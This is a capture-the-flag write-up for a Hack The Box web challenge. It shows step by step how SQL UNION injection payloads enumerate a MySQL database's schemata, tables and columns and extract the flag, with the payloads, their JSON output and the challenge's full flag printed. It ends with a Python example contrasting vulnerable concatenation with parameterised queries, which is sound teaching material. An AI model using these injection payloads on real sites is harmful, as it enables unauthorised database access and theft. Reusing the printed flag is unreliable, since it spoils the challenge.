Web - Unholy Union

Description

On the outskirts of a forsaken town lies an abandoned warehouse, rumored to store more than just forgotten relics. Locals speak of an unholy union within its database, where spectral data intertwines with the realm of the living. Whispers tell of a cursed ledger that merges forbidden entries through mysterious queries. Some say that the warehouse's inventory system responds to those who know how to merge the right requests. Can you brave the haunted inventory system and unravel the ghostly union of data before the spirits corrupt the world beyond?

Homepage

The challenge name and the query itself suggest this can be solved with a SQL UNION injection.

Attack

Table description

First we search with a space to see the shape of an inventory record (a space matches everything, since the search uses the SQL LIKE operator):

  {
    "id": 1,
    "name": "Plumbus",
    "description": "A highly useful multi-purpose tool.",
    "origin": "Planet Schlooch",
    "created_at": "2024-10-22T14:12:33.000Z"
  },

So the row is int, str, str, str, date: five columns, which any UNION SELECT has to match.

User

ads'union select 1,user(),"","",NULL-- -

Result:

[
  {
    "id": 1,
    "name": "user@localhost",
    "description": "",
    "origin": "",
    "created_at": null
  }
]

Databases

SELECT * FROM inventory WHERE name LIKE '%ads'union select 1,schema_name,"","",NULL from information_schema.schemata-- -%'

Result

[
  {
    "id": 1,
    "name": "information_schema",
    "description": "",
    "origin": "",
    "created_at": null
  },
  {
    "id": 1,
    "name": "halloween_invetory",
    "description": "",
    "origin": "",
    "created_at": null
  },
  {
    "id": 1,
    "name": "test",
    "description": "",
    "origin": "",
    "created_at": null
  }
]

Our interest lies in the halloween_invetory database.

Tables

aaa'union select 1,table_schema,table_name,NULL,NULL from information_schema.tables where table_schema="halloween_invetory"-- -

Result:

[
  {
    "id": 1,
    "name": "halloween_invetory",
    "description": "flag",
    "origin": null,
    "created_at": null
  },
  {
    "id": 1,
    "name": "halloween_invetory",
    "description": "inventory",
    "origin": null,
    "created_at": null
  }
]

So there are two tables, flag and inventory.

Let's get our flag.

Column

SELECT * FROM inventory WHERE name LIKE '%aaa'union select 1, NULL,table_name,column_name,NULL from information_schema.columns where table_name="flag"-- -%'

Result:

[
  {
    "id": 1,
    "name": null,
    "description": "flag",   // table name
    "origin": "flag",        // column name
    "created_at": null
  }
]

The flag table has a single column, also named flag.

Flag

SELECT * FROM inventory WHERE name LIKE '%aaa'union select 1, flag, NULL, NULL, NULL from halloween_invetory.flag-- -%'

Here halloween_invetory.flag is database.table: qualifying the table with its database name is the usual way to read values from a different database once the database, table and column names are known.

Result:

[
  {
    "id": 1,
    "name": "HTB{uN10n_1nj3ct10n_4r3_345y_t0_l34rn_r1gh17?_9c967dbf96425dc2df3b06135f0d003d}",
    "description": null,
    "origin": null,
    "created_at": null
  }
]
The name field here carries a value from the flag column.

HTB{uN10n_1nj3ct10n_4r3_345y_t0_l34rn_r1gh17?_9c967dbf96425dc2df3b06135f0d003d}
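To see why the search box was exploitable and what the fix looks like, here is an added example (not the challenge's own code) that rebuilds the echoed query `SELECT * FROM inventory WHERE name LIKE '%...%'` in two ways: string concatenation, as the challenge did, and a bound parameter. It uses an in-memory SQLite stand-in with a constructed inventory row and a constructed flag table, so the database name, schema and flag value are assumptions, not the real ones.

```python
import sqlite3


def build_db():
    # Constructed stand-in for the challenge database: the inventory columns
    # match the int,str,str,str,date layout seen in the JSON, plus a second
    # table that the search feature should never be able to reach.
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE inventory(id INTEGER, name TEXT, description TEXT,
                               origin TEXT, created_at TEXT);
        INSERT INTO inventory VALUES
            (1, 'Plumbus', 'A highly useful multi-purpose tool.',
             'Planet Schlooch', '2024-10-22T14:12:33.000Z');
        CREATE TABLE flag(flag TEXT);
        INSERT INTO flag VALUES ('FLAG{constructed-placeholder}');
        """
    )
    return db


def search_vulnerable(db, term):
    # The search term is pasted into the SQL text. A quote in the term closes
    # the LIKE literal and everything after it is parsed as SQL, which is
    # exactly what lets a UNION SELECT pull rows from another table.
    sql = f"SELECT * FROM inventory WHERE name LIKE '%{term}%'"
    return db.execute(sql).fetchall()


def search_safe(db, term):
    # The term travels as a bound parameter, so it is only ever data. The LIKE
    # wildcards are escaped too, so a term like "%" cannot match every row.
    escaped = (term.replace("\\", "\\\\")
                   .replace("%", "\\%")
                   .replace("_", "\\_"))
    sql = "SELECT * FROM inventory WHERE name LIKE ? ESCAPE '\\'"
    return db.execute(sql, (f"%{escaped}%",)).fetchall()


if __name__ == "__main__":
    db = build_db()
    # Same UNION shape as the write-up, aimed at the constructed flag table.
    payload = "ads' UNION SELECT 1, flag, '', '', NULL FROM flag-- -"
    print("vulnerable:", search_vulnerable(db, payload))
    print("parameterised:", search_safe(db, payload))
```

The vulnerable search returns the constructed flag row, while the parameterised search returns nothing, because no inventory name contains the literal payload text.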

___________________heapbytes' still pwning
